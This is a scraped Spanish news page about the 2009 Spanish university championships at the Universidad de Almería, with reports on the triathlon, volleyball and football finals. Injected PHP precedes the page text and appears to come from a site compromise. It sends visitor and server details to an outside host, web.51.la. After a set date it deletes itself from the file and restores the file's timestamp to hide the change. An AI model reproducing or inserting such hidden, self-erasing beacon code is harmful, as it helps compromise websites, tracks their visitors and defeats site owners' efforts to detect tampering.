check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735756){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } CEU 2009. Universidad de Almería
CEU 2009. Universidad de Almería
Miguel Angel Hidalgo, de la Univ. Polit. Cataluña, y Maria Ortega, de la Univ. Las Palmas, ganan las pruebas de Triatlon PDF Imprimir E-mail

Una vez finalizada la competición de Triatlon concluyen los Campeonatos de España Universitarios 2009 que a lo largo de toda la semana se han venido desarrollando en la Universidad de Almería.

Leer más...
 
Todo preparado para la celebración del CEU de Triatlon PDF Imprimir E-mail
Tras finalizar la competición del Campenato de España Universitario 2009 en las modalidades de fútbol y voleibol, todo está ya preparado para que se inicie la competición en la disciplina de triatlon.

El triatlon se disputa en la distancia Sprint, es decir, el segmento de natación tiene una distancia de 750 metros, el segmento de ciclismo 20 km. y el segmento de carrera a pie 5 km.

Todas las pruebas se disputan en el entorno de la Universidad de Almería. La natación tendrá lugar en la playa de la Universidad, el ciclismo en un circuito entre la Universidad y la rotonda de Nueva Almería y la carrera a pie por un circuito entre los diferentes edificios de la Universidad, en el campus. Además, en el pasillo central de la Universidad, junto a la rotonda de la parada de autobús, está ubicada la zona de transición, boxes, etc.
 
Una gran final de Voleibol masculino, ganada por la UAL, cierra el CEU de voleibol PDF Imprimir E-mail
El encuentro se ha resuelto por tres sets a uno a favor de la Universidad de Almería, que en la final se enfrentaba a la Universidad de Málaga.

El partido comenzó siendo claramente dominado por el equipo malagueño, que venció en el primer set por un contundente 16-25. Tras este primer set, los jugadores de la Universidad de Almería consiguieron deshacerse de los nervios y comenzaron a desarrollar su mejor juego, con una buena dirección del colocador Víctor Viciana. Fruto de ello fueron los siguientes parciales de 25-18, 25-22 y 25-23 a favor de los almerienses.
 
Las chicas de Voleibol de la UAL vencen con rotundidad en la final de voleibol PDF Imprimir E-mail
Las chicas entrenadas por Álex Batista no dieron ninguna opción a la Universidad de Granada en la final del Campeonato de España Universitario. Por la vía rápida y sin contemplaciones han ganado el título universitario.
Leer más...
 
La UAL se impone en una emocionante final de fútbol PDF Imprimir E-mail

La Universidad de Almería se ha impuesto por un tanto a cero a la Universidad de Valladolid en la final del Campeonato de España Universitario de Fútbol 11.

El partido, disputado en el Estadio de la Juventud "Emilio Campra", ha sido dirigido por el colegiado almeriense de primera división Juan A. Fernández Borbalán.

Leer más...
 
<< Inicio < Prev 1 2 3 Próximo > Fin >>

Página 1 de 3

Colabora

              

               

   

Organiza



Patrocina










 
Valid XHTML & CSS | Template Design ah-68 | Copyright © 2009 by Firma